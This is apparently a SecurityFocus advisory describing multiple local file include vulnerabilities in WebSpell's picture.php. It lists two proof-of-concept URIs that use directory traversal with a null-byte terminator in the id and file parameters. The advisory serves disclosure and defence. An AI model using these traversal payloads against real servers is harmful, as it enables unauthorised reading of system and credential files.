WebSpell Picture.PHP Multiple Local File Include Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/picture.php?id=../../../[FILE]%00
http://www.example.com/picture.php?file=../../../[FILE]%00


 

Privacy Statement
Copyright 2010, SecurityFocus